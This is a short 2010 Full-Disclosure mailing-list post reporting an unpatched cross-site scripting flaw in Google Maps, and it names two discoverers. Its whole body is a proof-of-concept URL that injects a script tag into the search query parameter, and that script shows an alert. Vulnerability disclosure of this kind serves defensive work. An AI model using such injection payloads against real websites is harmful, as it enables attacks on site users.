
Date: Tue, 12 Jan 2010 16:50:32 +0530
From: gaurav baruah <baruah.gaurav@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Google Maps XSS (currently unpatched)

Google Maps XSS (currently unpatched)

Discovered By -
Pratul Agrawal (pratul2u@...il.com)
Gaurav Baruah  (baruah.gaurav@...il.com)


PoC - http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
